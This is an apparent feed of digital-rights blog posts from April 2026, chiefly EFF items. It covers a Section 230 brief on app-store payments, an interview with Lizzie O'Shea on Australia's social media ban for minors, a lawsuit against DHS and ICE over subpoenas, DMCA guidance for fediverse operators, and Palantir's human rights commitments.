However, in our brief we urged the Ninth Circuit to reverse the district court and hold that Section 230 does apply to the app stores, even when they process payments for virtual chips within the social casino apps. The app stores would undeniably have Section 230 immunity if sued for simply hosting the allegedly illegal social casino apps in their respective stores. Congress made no distinction—and the court shouldn’t recognize one—between hosting third-party content and processing payments for the same third-party content. Both are editorial choices of the platforms that are protected by Section 230. We also argued that a rule that exposes internet intermediaries to potential liability for facilitating a financial transaction related to unlawful user content would have huge implications beyond the app stores. All platforms that facilitate financial transactions for third-party content would be forced to censor any user speech that may in any way risk legal exposure for the platform. This would harm the open internet—the unique ability of anyone with an internet connection to communicate with others around the world cheaply, easily, and quickly. The plaintiffs argue that the app stores could preserve their Section 230 immunity by simply refusing to process in-app purchases of virtual chips. But the plaintiffs’ position fails to recognize that other platforms don’t have such a choice. Etsy, for example, facilitates purchases of virtual art, while Patreon enables artists to be supported by memberships. Platforms like these would lose Section 230 immunity and be exposed to potential liability simply because they processed payments for user content that a plaintiff argues is illegal. That outcome would threaten the entire business models of these services, ultimately harming users’ ability to share and access online speech. 
The app stores should be protected by Section 230—a law that protects Americans’ freedom of expression online by protecting the intermediaries we all rely on—irrespective of their role as payment processors.

  • Speaking Freely: Lizzie O'Shea
    by Jillian C. York on April 23, 2026 at 7:56 pm

    Lizzie O’Shea is an Australian lawyer, author, and the founder and chair of Digital Rights Watch, which advocates for freedom, fairness, and fundamental rights in the digital age. She sits on the board of Blueprint for Free Speech, and in 2019 was named a Human Rights Hero by Access Now. Interviewer: Jillian York Jillian York: Hi, good morning, or rather, good evening for you. Lizzie O’Shea: Hi Jillian, it's great to be here.  JY: I'm going to start with asking a question that I try to kick off every interview with, which is, what does free speech or free expression mean to you? LO: Yes, so Digital Rights Watch, which is the organization I founded and I chair, is focused on fundamental rights and freedoms in the online world. And so freedom of speech is obviously a big part of that. It's obviously a very vexed right, partly because of its heritage and interpretation in places like the United States, which sometimes sits in contrast culturally to other parts of the world. Certainly, if you ask Australians about it, they do not want to have a culture of free speech that looks like the United States.  Australians understand that freedom of expression is a really important component of democracy. So one of my jobs is to make the claim that curtailing freedom of speech, including in online settings, can have a real impact on democracy. And I think that's fundamentally true, and you don't want to wait until it's too late to be able to make that argument, to ensure that the policies are in place to protect that freedom. So I think it's a really important freedom. It's got a vexed history and expression in the modern online world, but many people still instinctively understand that those in power see speech as something that is important to challenging their authority, and so it can be a really important place to fight back and protect democracy and other rights from being impacted by those who hold power at the moment. JY: I want to ask you about your book. 
You're a critic of techno-utopianism. Your book, Future Histories, came out right before the pandemic, if I recall, and it looks to the past for lessons for our technological and cultural future. I really appreciated your take on Elon Musk. So I guess what I want to ask you about is two things. What, in your view, has changed since you wrote it? LO: Yeah, that's a really interesting question. I must admit, I was thinking about it the other day whether some of what I wrote really holds up. And I think the fundamentals are still true, in the sense that I still believe that a lot of the discussions and debates we have about technology today are presented as fundamentally novel when they are very old, ancient discussions and debates about how power should be distributed through society, and how technology enables that kind of power distribution or works against it, right? So I feel like that fundamental analysis, whatever contribution to the field, is still valid, of course. In some ways though, those technical systems have become more opaque, like the artificial intelligence industry and how that's been built off the back of years of exploitation of personal information and centralization of power in technology companies. Those things have become more powerful and concentrated and difficult to understand—if you're not deep in the weeds—beyond an instinctive understanding that something's going a bit wrong, perhaps.  So in some ways those trends have exacerbated things in ways that I think many other contributors, yourself included, have brought a really important set of analyses to these discussions. More generally, though, one of my fundamental understandings of how I frame some of these arguments is that there are two sources of power, right? Government power and corporate power that really shape how the online world is developing. 
And post-pandemic, there's a lot greater skepticism, criticism, and outright distrust of government authorities seeking to do work to protect people from some of those corporate excesses. Now that's obviously something that is much more part of American culture as opposed to European culture, and in Australia, we sit somewhere in between. But that skepticism and that mistrust of institutions, I don't know that that serves us well. I'm somebody who does treat with criticism policies put forward by government, because I think it's our job as civil society people, as people part of a social movement that want to have rights at the center of our society, to be critical of those in power and make sure that they're being held accountable. But that mistrust has fundamentally shifted how possible it is to do that in an effective way. And I think that poses real challenges for people who want to see government policy look different to how it is and how you can bring people into a sense of trust, investing in a democratic rights based society, rather than rejection and cynicism being the overriding, overriding kind of factor in how they shape their political arguments. Which is a real challenge, I think, for people like us who rely on some of that mistrust and skepticism in order to fuel the fire of some of these campaigns, but do want to see people still invested in democratic processes. JY: Yeah, absolutely. So speaking of policies, you're in Australia, where the government's enacted some of the strictest social media laws for minors in the world, I would say. In one of our most recent interviews, which was with Jacob Mchangama, we talked about how the comparison of social media to Big Tobacco is spreading, and this idea that there's no utility in social media for minors, that it's a net harm. I'm curious what your thoughts are on that, and then we can dive into the more nitty gritty bits of the Australian law. 
LO: I think that's a great place to start, because the overwhelming sense in how this policy was presented to the public in Australia is that this is a very dangerous place for young people to be, and that desperate times call for desperate measures. “We don't have time to fix these spaces. We need to just restrict access.” It's described as a delay. Many, including me, describe it as a ban for under 16 year olds. So what has been very interesting in this discussion is who's been left out of the conversation. And if you talk to young people—and there are many organizations working with young people—and you talk to them about what they use social media for, they often say that they wish adults understood that they used it for different reasons, or they're scared about different things than what adults think they might be scared of. And so that kind of fundamental failure of communication, which I suppose is not a surprise, when these people don't actually have the power to vote, have the power to do things a normal legal person would do, is somewhat unsurprising. But when you're making policy about these people, that can be quite impactful, it can have very detrimental impacts. And if you take a human rights approach, that is your job to think about the negative impact on human rights, and what you're going to do about it, it's not really good enough. And this has been an experiment that Australia has led on, very much, looking for headlines, for a perception of boldness. Some of that claim is legitimate in the sense that they want to be seen to be taking action, and a lot of people feel very concerned that governments aren't prepared to take action against big tech companies. So, some of that is a valid feeling. But I think in this context, we lose so much when we don't actually listen to the people affected, and listen to the myriad ways in which they use social media. 
Some things they're concerned about, some things they find harmful, some things they're really sick of. But there's so many ways in which they use it to find a sense of community, to find a sense of empowerment, to talk to people they would never otherwise be able to access, sometimes because they're isolated, socially, geographically, whatever it may be, and it's so disappointing to me that that kind of part of the conversation was not had as we debated this particular policy. JY:  So, what do you think some of the harms are for youth who can't access social media? What are young people losing out on? Who is harmed by these laws? LO:  It's a great question. When we do a human rights analysis, we have to think about who's harmed by a particular policy, even if we think it's overall justified on a utilitarian ground, say it's better off for everyone overall who's harmed, is a really important question, and so much of that has been absent from this discussion. So it's not just me. It's like hundreds and hundreds of experts in Australia and organizations that represent many, many people, have provided commentary and input into this process and expressed many concerns about this policy, and there's a few different ways in which people are harmed.  So the first thing, of course, is that if you require that age verification occur, you're engaging in a privacy violation for many people, there are cyber security risks with collecting that kind of information. There's deterrent effects and the like. Now that may not concern you, or you may think that's a justifiable kind of infringement on privacy rights, but I think that's worth mentioning. It is quite significant, especially in a world in which age verification doesn't tend to work very well on any measure. There are very serious cybersecurity risks that have been associated with age verification processes and the like. So it's certainly not nothing. 
The other set of people that are harmed are particularly vulnerable people.  There's a variety of people who are still accessing social media. So it looks like about seven in ten of young people on the early data who had social media accounts are still accessing social media now. Now these are early figures, so there's a lot to be said for looking at how this works in a year's time, for example. But I think one of the interesting things to think about is when those people, young people, who are still on social media—in breach of this ban or in defiance of this ban, however you want to put it—might need to engage in help seeking behavior, there may be a deterrent there, because they know that the law is they're not supposed to be accessing social media. So that is a selection of young people that we're particularly concerned about. And then, more generally, of course, there's a whole cohort of people who are particularly vulnerable. Maybe they're LGBTIQ, maybe they're in an isolated geographic area, far away from a city. Maybe they're experiencing harm at home and have no one to talk to about it. There's all sorts of ways in which young people use social media to manage their own challenges, harms, difficulties, and very effectively. They find people to talk to about their problems when other people may not be available to them. And that is an issue that is hard to map, right? We know that there's been an increase in calls to things like Kids Helpline, which does what it says on the tin. So those kinds of things have seen an increase. But I think that is something that is harder to map, but still very, very important, and may result in people going to other parts of the internet as well to seek help in different ways that might also not be very safe for them.  
More generally it's worth remembering that if platforms can say with some confidence, from a policy perspective, that young people are no longer on their platform, there is less incentive to design for them as well, which is another associated problem. Now, it remains unclear as to how platforms are dealing with that issue, especially in light of the most recent data, which suggests that a lot of young people remain on the platforms. But that's an issue. Do we then allow platforms to no longer design in a way that respects the autonomy of young people, the safety of them, their security and the like, because they have special needs and interests and all those sorts of things. So that's another problem. There's lots of operational problems. There's lots of conceptual ones. I don't think many of these have been considered or accounted for in the process. JY: Absolutely, those are the same things that worry me as well. Okay, let's talk about the campaign. So what has the pushback to this, to the law, looked like, and what changes were you calling for? LO: Well, if I can Jillian, what I might start with is where the push came from. Because I think that's quite instructive. One of the key sets of institutions that were pushing for this ban were mainstream news organizations, and we're learning a bit more about this over time, but the Murdoch press and other large news organizations in Australia—Australia has one of the most concentrated media environments in the world—were pushing for this ban. There was a petition run on one of their websites that was gathering tens of thousands of signatures. There were also others. Then there was a lot of advocacy towards specific kinds of political leaders in the country, and then a kind of competitive race to see who could be the most extreme in terms of putting forward a policy. 
But it's certainly the case that this very powerful set of actors in our democracy, at least, were a key driver of this campaign for a social media ban for young people. Now, I think there's a sense of moralism about it, a sense of desperation about it, tapping into genuine fears from parents, you know, and the like. And you know, The Anxious Generation, the book by Jonathan Haidt, has obviously been very influential with many people, but the research is still a bit unclear, right? About what this all means. And lots and lots of researchers will tell you that that book isn't making a reasonable argument based on the data that we have, right? So, it's a very febrile environment for this kind of discussion, and those kinds of institutional actors were incredibly important in getting this on the political agenda. We then had an electoral campaign, definitely a vision that conservative politics would push for this. So labor politics, you know, center left politics pushed for it, and won the election, right? Not on this issue alone, but it was in that environment in which this policy was developed. There was a very small amount of time for submissions, for policy discussion about it. Initially, the government had said they weren't going to do it because they were concerned that the age verification technology wasn't up to scratch. That changed very, very quickly, and then the policy was introduced. I think it was in six days, some very small amount of time. 
So many different child rights organizations, academics, institutions, filed policy submissions to discuss this, did a lot of advocacy work, but the passage of time between the announcement of the proposal and the passage of the legislation was extremely short, and what followed has been a year of discussion around whether this was a good thing, a year of testing age verification technology, often finding it wanting, but setting up a set of preferred providers that platforms could use in order to satisfy the legislative requirements. A lot of lobbying from platforms as to whether they're in or out. There was a big discussion about whether YouTube should be in or out. And a lot of back room dealing between relevant politicians and big tech companies. So the whole thing is very unseemly, and we're now in the world where it's been introduced, a lot of failure for it to actually operationalize now. Now, it may be that that changes over time, but that's quite telling, right?  It's telling also because I don't think all parents particularly like this proposal either. It's very popular, but there's certainly a section of parents that are facilitating their children's continued access to social media. And I think that's interesting in itself. Part of what it is—something we were talking about actually earlier in our conversation—people don't like governments telling them how to parent their children. That has taken some very negative expressions in parts of the world, you know, resistance to things like the availability of medicine and treatment for kids who might be trans. But in this context, it's like, “I'm not going to let the government tell me that I can't let my kid on social media.” So, I don't think it's clarified much in the debate in terms of understanding how platforms behave towards young people, what they could do better, of which there's many things, and then how we get to the world in which children are able to be online but better protected. 
I'm not sure this proposal has contributed to that. It's really muddied the waters about what the government is capable of doing, what it should be doing, and what platforms, you know, what should be the process that platforms go through when thinking about designing for children. JY: That's such a great answer. Thank you. And actually, that brings me to another question, which is so in your ideal world, taking this law, being able to throw it out the window if you want…What would you what would you want to see, not just from social media, but from from the platforms, from governments, both for the sake of youth, but also, you know, for all of us. LO: I think that is the exact right question to be asking, and it's a good time that we've managed to talk now, because actually, in the interim, what's come out is at the first draft that we've got of a Children's Online Privacy Code. And to me, that is really revealing, because it is designed to apply to all services that might be accessed by children, like all online services, and it has a really kind of sophisticated understanding of what consent might look like, where you need help with getting consent, when it comes to parents or adults that are supportive in your life. And then at different ages that might look a bit different, like you might get notified if consent has been refused by your caregiver, for example, if you've wanted to do something. So there's a more sophisticated understanding of what consent looks like, and a range of different restrictions on when private, when personal information can be collected and used. It's got things in it that I don't particularly like. I would like to see a prohibition on the commercial exploitation of children's personal information, because I don't think any targeted advertising is justified, for example. And I think that kind of measure of that commercial exploitation is hugely problematic. I think we have to think about what deletion looks like. 
I think you should have a right to deletion, for example. But you know, we also have to respect that children grow into young adults, that making decisions at 16 might look quite different to when they're three. So what you do with their personal information, how they carry that forward into their adult lives might be different depending on the age and so that kind of privacy reform actually is the fundamental thing. I’m sure your listeners don’t need reminding of this. That is my favorite right. Because I think restricting access to personal information is a rights-respecting way to improve the online environment for everybody. And what I think is really interesting about this Children's Online Privacy Code that is still in draft form, is that all these things should be available to adults as well. Like adults in Australia don't have the right to deletion at the moment. We don't have a right to comprehensively know where our information has traveled and to delete it. You know, look, we have fewer rights than Californians, for example, certainly fewer rights than Europeans. What this code has highlighted is that, in fact, all people should be enjoying this kind of protection that comes from restricting access and use of personal information and giving people more control over that, because that personal information is the raw material of the business model, and it leads to a very loose approach to its collection and leads to many negative downstream consequences, I would argue, including business models that prioritize engagement, that prioritize and monetize polarizing, extremist content, mis- and disinformation. I think we could have a real crack at trying to ameliorate some of these problems, or certainly reduce their impact, if we started that fundamental raw material that fuels the business model. 
So that, I think, is a really telling alternative that we're now considering as a society, and I like to think that people will come to an understanding that you can find ways to improve the online world, particularly for young people, without restricting their access to that online world in a way that is empowering for them, rather than patronizing or infantilizing.  JY: I completely agree, and I think it's funny that people often see privacy and expression at odds with each other, when actually I think privacy enhances expression. LO: I think it makes spaces safer, makes people freer to be able to say what they think, but also to have those discussions in ways that are more meaningful, that can help find connections, even across divisions, rather than exploiting that division for profit, which is so much of the current business model. JY: Are there any other things happening in Australia that EFF’s readers should know about? LO: Well, we're about to go through the second tranche of our privacy reform. So we did engage in our first tranche of privacy reform. We have a Privacy Act that was passed in 1988 and hasn't been meaningfully updated in the decades since. So we got a few small changes, which included the enabling provision to allow a Children's Online Privacy Code to be developed, which is why we're getting the benefit of that now. But we're about to see a range of different privacy laws introduced. What the content is, of course, will be the subject of a lot of discussion and debate. We're going to argue for the right to deletion, the right to a private right of action for privacy harms, better processes for consent, and improved definitions of personal information to really bring Australia in line with lots of other similar jurisdictions around the world. And we're really keen to advance that for all the reasons that I just mentioned.  
The other big change that I think is coming is that, you know, which is perhaps more on topic for this conversation, is that we've had this online safety policy that is constantly being touted as the first in the world, and world leading and this and that, and it's really been a very flawed and vexed process working out how we could develop codes that were designed to govern how certain services were provided in the digital age, in line with safety expectations. There’s been a lot of focus on complaints and take down notices and things like that, there's obviously been that vexed litigation with Elon Musk, trying to get him to take down a particular video, and ultimately, the failure of our regulators to succeed on that front, I think, probably correctly, because giving a regulator in Australia the right to take down content from anywhere in the world seems to me a very concerning development, if that was allowed to proceed. So this history of online safety, it's been a big part of successive Australian governments’ identities. We're about to see the introduction of a digital duty of care. So that's certainly the stated position of government. What that looks like in practice, I think will be really interesting.  I like the idea of a digital duty of care. I like the idea of a flexible, overarching concept. What the content is, though, will be really important. So what I would like to see is proactive disclosure of harm or risk of harm, and then actions taken by platforms to do it. So more onus on platforms to provide transparency about what they know about how their online spaces are being used and what might be harmful. 
I mean, there's a question around whether we'll see an introduction of a civil right, something similar following from the litigation that’s taken place in California and New Mexico, and that is going to be leading, really, multiple claims that are being made all around the country in the US, against companies like Meta and Google and other social media platforms. So I think there may be a flow-on effect from that, as in, it might turn into a civil right to sue for failure to meet the requirements of digital duty of care. But I'm really interested to hear from any of your listeners, or anyone who's working in this space about what the content should be of that digital duty of care, because there's obviously limits as well. Like it can be not rights-respecting, and we're interested in making sure that's not the case. And I think there's probably a range in which it could be more protective or less and working out how to do that—there are examples from around the world, but that's going to be something I reckon we could use help with that we want to get right and make use of that opportunity as best we can.  The last thing I'll say, I suppose, is that our government is always looking for ways to deal with mis- and disinformation, and that comes with real risks of censorship. And so, I think there's a strong argument to focus on privacy reform, because it's a rights-respecting reform as an antidote to mis- and disinformation. Greater transparency on platforms—I think about how they prioritize content in your feed, for example, can be useful, or reporting on what content is really popular, like ad libraries. There's all sorts of ways in which we can introduce greater transparency, but I do worry that as governments around the world feel emboldened to do so, they might look for more ways to remove content, to be more involved in content moderation policies that have the real potential to become censorship if we're not careful. 
So that's the other abiding concern I've got about Australian policy at the moment. JY: One of my big concerns now too, is all of these authoritarian governments watching Australia, watching the UK, and enacting laws that are modeled on, but much more severe than the ones in those places? Do you share that concern?  LO:  Yeah. I mean, the other way in which it's come about in Australia, certainly like anti-doxxing laws, which, at the moment, we've got laws on our books that came about attached to a privacy reform. I'm hesitant to say it's a privacy reform, because it's not, but it's very egregious. It's a criminal offense to disclose basic details about someone online, if it's done with a set of intents and the like, about their particular status as a group, and that, I think you could drive a truck through in terms of how you could interpret it, right? There's such a wide variance, and bringing a proceeding against someone like prosecuting them for that is such a life altering experience. And I think if governments did want to focus on particular activists. And I'm particularly thinking of, you know, the way it was framed was certainly around the discussion and debate about the genocide unfolding in Gaza. Like, I think, particularly about that movement, they're very vulnerable to crackdowns by government for speech that is perceived to be unacceptable by government.  And I'm not even trying to debate it. I think there's certainly antisemitic commentary occurring in Australia, and indeed, there have been some people, like genuine Nazis arrested, which, you know is, is a different kettle of fish. But I think progressive movements, not just the defense of Palestine movement, but lots of other progressive movements are at particular risk from those kinds of laws. But I think mis- and disinformation is the other vehicle. 
So we have to be very careful about giving platforms, giving regulators both the mandate and then the authority to police content based on particular criteria. And often what they talk about, or they talked about in proposals that have now died in Australia, were things like public health issues. So, you know, that's a particular concern that drives a lot of people who are very concerned about the years of Covid up the wall. So it inspires a lot of reaction to it. But I think there's lots of ways in which undermining political stability is put forward as a proposal, as a justification for removing content. That's just so broad that I think you could really start to see censorship. It's just not good enough. I just don't think we can tolerate those kinds of proposals. I like to think that's not the case in Australia, but I just think there's a tendency among governments now to see this as an opportunity. It's an anxiety lots of people have about mis- and disinformation, and so they draw on that as a mandate to act. And I think we should be very cautious about those proposals. JY: Definitely. Okay, I’m going to ask the final question that I ask everyone. Who is your free speech or free expression hero? Or someone from history, or even someone personal who has influenced you? LO: There’s a chapter in my book where I talk about the Paris Commune, which happened a long time ago, but I still think it’s a really interesting experiment in applied democracy. This is when a bunch of Communards took over Paris and started doing things differently in a variety of different ways. Gustave Courbet is this artist who’s leading the artist collective during this time, and I always found him entertaining because he would paint things that weren’t expected. So, often, nudes that were considered quite scandalous because they were everyday women who weren’t angelic or Madonna-esque in their style, but he’s got a very famous painting of female genitalia— JY: Yes! Facebook took it down! 
[laughs] LO: Exactly. It’s always been a very confrontational image. People find it sexist sometimes, because they think it’s very pornographic. I understood it differently. It’s called “The Origin of the World,” so I sort of see it as a force of giving life. Interpret however you like, the point is that Facebook couldn’t tolerate it and took it down. There’s a nice little bit of litigation where a schoolteacher had a page where he was teaching people that art, and Facebook could just not tolerate this art. In my mind, it was so telling that a Communard from hundreds of years before was basically revealing, as an expert troll almost, how conservatives—someone like Mark Zuckerberg—view, and how he shapes these platforms. And how they subtly reshape what we think is appropriate, what we think is free, what we think is within the realms of good society. And that you really do need artists telling you that that might not be true, and they’re some of the most effective actors at revealing that about those who hold power, like reshaping our understanding about what acceptable debate is, and how we can show power to be exercised in our online world, where in other circumstances it might be quite okay. I love that story, and I love the Communards. There’s a lot of beautiful writing about them, there’s a beautiful book called Communal Luxury where they talk about all the different ways in which they were trying to reimagine their society and do it collectively, from things like having the first union of women but also having the design of clothes and furniture look different. I want to see a world in which people take that power in both the micro and macro and start to reshape their society in really creative ways. 
And I feel like digital technology has the real capability of allowing that to occur and I want to revive that sense of concrete democracy rather than just delegated democracy or deferred representative democracy where you tell someone else what you want but don’t have a say in a lot of decisions. And so, that really grassroots idea of democracy is something, and I think we’re in a world in which that could really occur with the assistance of digital technology. It’s a matter of working out how to bring it into being. And that’s what I see this movement as doing. People with digital rights as being their primary concern are trying to recreate that world so that there’s more communal, collective spaces for discussing what the future should look like.

  • Stop The Fraud: The Government Hates Competition
    by Daniel McAdams on April 23, 2026 at 5:00 pm

    To say that the U.S. federal government is ‘a little less than truthful’ would be the understatement of the century. It’s expected that politicians bend the truth. When it comes to power and money, the incentive to lie is always there; and it’s very often chosen. But lying can turn into an addiction … The post Stop The Fraud: The Government Hates Competition appeared first on LewRockwell.

  • 📁 How ICE Got My Data | EFFector 38.8
    by Christian Romero on April 22, 2026 at 6:25 pm

    When we use the internet, we're entrusting tech companies with some of our most private information. These companies have promised they'll keep our data safe. But what happens when the government comes knocking at their doors? In our latest EFFector newsletter, we hear from an EFF client whose data was given to ICE after Google broke its promise to him. JOIN OUR NEWSLETTER For over 35 years, EFFector has been your guide to understanding the intersection of technology, civil liberties, and the law. This latest issue covers the ongoing fight to reform NSA surveillance, the many attempts to censor 3D printing, and the cost of Google's broken promise to its users. Prefer to listen in? EFFector is now available on all major podcast platforms. This time, we're chatting with EFF Senior Staff Attorney F. Mario Trujillo about how state attorneys general can hold Google accountable for failing to protect users targeted by the government. You can find the episode and subscribe on your podcast platform of choice: %3Ciframe%20height%3D%22200px%22%20width%3D%22100%25%22%20frameborder%3D%22no%22%20scrolling%3D%22no%22%20seamless%3D%22%22%20src%3D%22https%3A%2F%2Fplayer.simplecast.com%2Feb78b9d6-fbcf-453f-b55e-77c575b638ef%3Fdark%3Dfalse%22%20allow%3D%22autoplay%22%3E%3C%2Fiframe%3E Privacy info. This embed will serve content from simplecast.com     Want to help us hold companies accountable? Sign up for EFF's EFFector newsletter for updates, ways to take action, and new merch drops. You can also fuel the fight for privacy and free speech online when you support EFF today!

  • EFF Sues DHS and ICE For Records on Subpoenas Seeking to Unmask Online Critics
    by Hudson Hongo on April 22, 2026 at 3:51 pm

    Agencies Ignored EFF’s Public-Records Requests Regarding Unlawful Efforts to Locate People Who Criticized the Government or Attended Protests.SAN FRANCISCO – The Electronic Frontier Foundation (EFF) sued the Department of Homeland Security (DHS) and Immigration and Customs Enforcement (ICE) today demanding public records about their use of administrative subpoenas to try to identify their online critics.Court records and news reports show that in the past year, DHS has used administrative subpoenas to unmask or locate people who have documented ICE's activities in their community, criticized the government, or attended protests. The subpoenas are sent to technology companies to demand information about internet users who are often engaged in protected First Amendment activity.These subpoenas are dangerous because they don’t require judges’ approval. But they are also unlawful, and the government knows it. When a few users challenged them in court with the help of American Civil Liberties Union affiliates in Northern California and Pennsylvania, DHS withdrew them rather than waiting for a decision.DHS and ICE have ignored EFF’s public-records requests for documents about the processes behind these subpoenas, so EFF sued Wednesday in the U.S. District Court for the District of Columbia.“DHS and ICE should not be able to first claim that they have the legal authority to unmask critics and then run from court when users challenge these administrative subpoenas,” said EFF Deputy Legal Director Aaron Mackey. “The public deserves to know what laws the agencies believe give them the power to issue these speech-chilling subpoenas.”An administrative subpoena cannot be used to obtain the content of communications, but they have been used to try and obtain some basic subscriber information like name, address, IP address, length of service, and session times. 
If a technology company refuses to comply, an agency’s only recourse is to drop it or go to court and try to convince a judge that the request is lawful.EFF and the ACLU of Northern California in February ​wrote to Amazon, Apple, Discord, Google, Meta, Microsoft, Reddit, SNAP, TikTok, and X​ to ask that they insist on court intervention and an order before complying with a DHS subpoena; give users as much notice as possible when they are the target of a subpoena, so the users can seek help; and resist gag orders that would prevent the companies from notifying users who are targets of subpoenas.And EFF last week ​asked California’s and New York’s attorneys general to investigate Google​ for deceptive trade practices for breaking ​its promise​ to notify users before handing their data to law enforcement, citing the case of a doctoral student who was targeted with an ICE subpoena after briefly attending a pro-Palestine protest.EFF in early March filed public-records requests with DHS and ICE for their policies, procedures, guidelines, directives, memos, and legal analyses supporting such use of administrative subpoenas. EFF also requested all Inspector General or oversight records, all approval and issuance procedures for the subpoenas, all records reflecting how many such subpoenas have been issued, all communications with technology companies concerning these demands, all communications regarding specific named targets or programs, and all communications with the Department of Justice regarding such subpoenas.DHS and ICE have not responded, even though EFF requested expedited processing of its requests, which requires agencies to get back to requesters within 10 days.“The policies, directives, and authorization records governing the program have not been disclosed,” the complaint notes. 
“The legal basis asserted by DHS and ICE for using a customs statute to compel disclosure of information about persons engaged in constitutionally protected speech and association has not been made public.” For the complaint: https://www.eff.org/document/eff-v-dhs-ice-administrative-subpoenas-complaintFor EFF’s letter urging tech companies to protect users: ​https://www.eff.org/deeplinks/2026/02/open-letter-tech-companies-protect-your-users-lawless-dhs-subpoenas​For EFF’s letter urging state probes of Google: ​https://www.eff.org/press/releases/eff-state-ags-investigate-googles-broken-promise-users-targeted-government​ Tags: free speechprivacyanonymityDHSICEContact:  AaronMackey Deputy Legal Director/Free Speech and Transparency Litigation Directoramackey@eff.org

  • Copyright and DMCA Best Practices for Fediverse Operators
    by Mitch Stoltz on April 21, 2026 at 6:28 pm

    People building the future of the social web — interoperable and decentralized — need to protect themselves against copyright liability. Like anyone who creates and operates platforms for user-uploaded content, the hosts of the decentralized social web can take preventive measures to reduce their legal exposure when a user posts material that violates someone’s copyright. This post gives an overview of the steps to take. It’s meant for operators of Mastodon and other ActivityPub servers, Bluesky hosts, RSS mirrors, and other decentralized social media protocols, and developers of apps for those protocols — but it will apply to other hosts as well. This isn’t legal advice, and can’t substitute for a consultation with a lawyer about your specific circumstances. It focuses on U.S. law — the law may impose different requirements elsewhere. Still, we hope it helps you get started with confidence. Why should I care? Copyright’s Sword of Damocles In some circumstances, the operator of a platform that handles user content can be legally responsible for content that infringes copyright. That can happen when the platform operator is directly involved in copying or distributing the copyrighted material, when they promote or knowingly assist the infringement, or when they benefit financially from infringement while being in a position to supervise it. But these judge-made rules are often difficult and uncertain to apply in practice — and the penalties for being found on the wrong side of the law can be severe. Copyright’s “statutory damages” regime allows for massive, unpredictable financial liability. That’s why it’s important to limit your risk. For Server Operators: Limiting Risk with the DMCA Safe Harbors If you run a social network server, the safe harbor provisions of the Digital Millennium Copyright Act (DMCA) are an important way to limit your liability risk. 
The DMCA shields server operators from nearly all forms of copyright liability that can result from “storage at the direction of a user” — in other words, hosting user-uploaded content. But to qualify for this protection, there are steps a server operator has to take. 1. Designate A Contact To Receive Copyright Infringement Notices First, you’ll need to provide contact information for someone who can receive infringement notices (a “designated agent”). That information needs to be posted in at least two places: on your server in a place visible to users (such as a “DMCA” page or post, or as part of your Terms of Service), and in the U.S. Copyright Office’s “Designated Agent Directory.” To post that information to the directory, you have to create an account at https://www.copyright.gov/dmca-directory/ and pay a small fee. The directory listings expire after three years, and once expired, your safe harbor protection goes away, so it’s important to keep that listing current. 2. Respond Promptly to Notices and Counter-notices When you receive infringement notices, it’s important to respond to them promptly. Notices are supposed to identify the copyright holder, the copyrighted work they claim was infringed, and the post they claim is infringing. By deleting or disabling access to the posted material, you protect yourself from liability with respect to that material. The theory behind Section 512 is that hosts don’t have to be in a position of deciding whether a post infringes someone’s copyright — it’s up to the poster, the rights holder, and potentially a court to decide that. A host who takes down posts whenever they receive an infringement notice is well-protected. But it’s equally important to recognize that hosts aren’t required to take down content in response to every notice. Infringement notices are frequently wrong, misguided, or abusive, or simply incomplete. 
Hosts who want to stand up for their users’ speech can choose to disregard infringement notices that seem suspect. While this risks losing the automatic protection of the safe harbor in each instance, it can still be done safely with careful preparation, ideally using a plan crafted with help from a lawyer. Bear in mind that people sending false notices, including by failing to consider whether a post is a fair use before asking a host to take it down, can be liable for damages under the DMCA. The DMCA also allows the person who posted the material to send a “counter-notification” asserting that they really did have the right to post and that there’s no copyright infringement. Responding to counter-notifications is a good way for a host to demonstrate that they look out for their users. When a host receives a counter-notification, they should forward it on to the person who sent the original takedown notice and let them know that the post will be restored in 10 business days. Then, after that waiting period has elapsed, the host can restore the posted material. Just like with infringement notices, a host isn’t required to honor a counter-notification that appears to be fraudulent, but there’s no penalty for honoring it anyway. 3. Have A Repeat Infringer Policy The next requirement is to have a policy of terminating the accounts of “subscribers and account holders” who are “repeat infringers” in “appropriate circumstances,” and to carry out that policy. Yes, that’s a vague requirement. It doesn’t require a “three strikes” policy or any other sports analogy. It just needs to be reasonable. Be sure your policy is spelled out in your website terms or “DMCA” page. 4. Don’t Ignore Known Infringement Hosts need to take down user posts whenever the host actually knows that the post is infringing. In other words, a host isn’t protected if they ignore takedown notices based on technicalities in the notices, or if they learn about the infringement some other way. 
But hosts don’t need to actively look for infringement on their servers — only to act when someone notifies them. 5. Don’t Encourage Infringement Finally, make sure that nothing you post or advertise actively encourages copyright infringement. For example, don’t post examples of users uploading copyrighted music or video without permission, or insinuate that your server is a good place for infringing content. There are some other technicalities in the DMCA that can affect the safe harbor, which is why it’s always a good idea to consult with a lawyer. But following these steps will help protect you when you run a social media server — or any other kind of user-uploaded content platform.

  • Palantir Has a Human Rights Policy. Its ICE Work Tells a Different Story
    by Cindy Cohn on April 21, 2026 at 12:06 am

    For years, EFF has pushed technology companies to make real human rights commitments—and to live up to them. In response to growing evidence that Palantir’s tools help power abusive immigration enforcement by ICE, we sent the company a detailed letter asking how the promises in its own human rights framework extend to that work. This post explains what we asked, how Palantir responded, and why we believe those responses fall short. EFF is not alone in raising alarms about Palantir; immigrants' rights groups, human rights organizations, journalists, and former employees have raised similar concerns based on reports of the company's role in abusive immigration enforcement. We focus here on Palantir’s own human rights promises. At the outset, we appreciate that Palantir was willing to engage respectfully, and we recognize that confidentiality and security obligations can limit what it can say. Nonetheless, measured against Palantir's own human rights commitments, its decision to keep powering ICE with tools used in dragnet raids and discriminatory detentions is indefensible. A good-faith application of those commitments should lead Palantir to end its contract with ICE, and refuse new, or end current, contracts with any other agency whose work predictably violates those commitments. Palantir’s Public Promises Palantir has long said it performs comprehensive human rights analysis on its work. It has also worked with ICE for years, apparently in a more limited capacity than today. It has publicly embraced the UN Guiding Principles on Business and Human Rights, the Universal Declaration of Human Rights, and the OECD Guidelines for Multinational Enterprises. Additionally, in its response to EFF, Palantir says its legal responsibilities are only “the floor” for broader risk assessments. That was the point of our letter. 
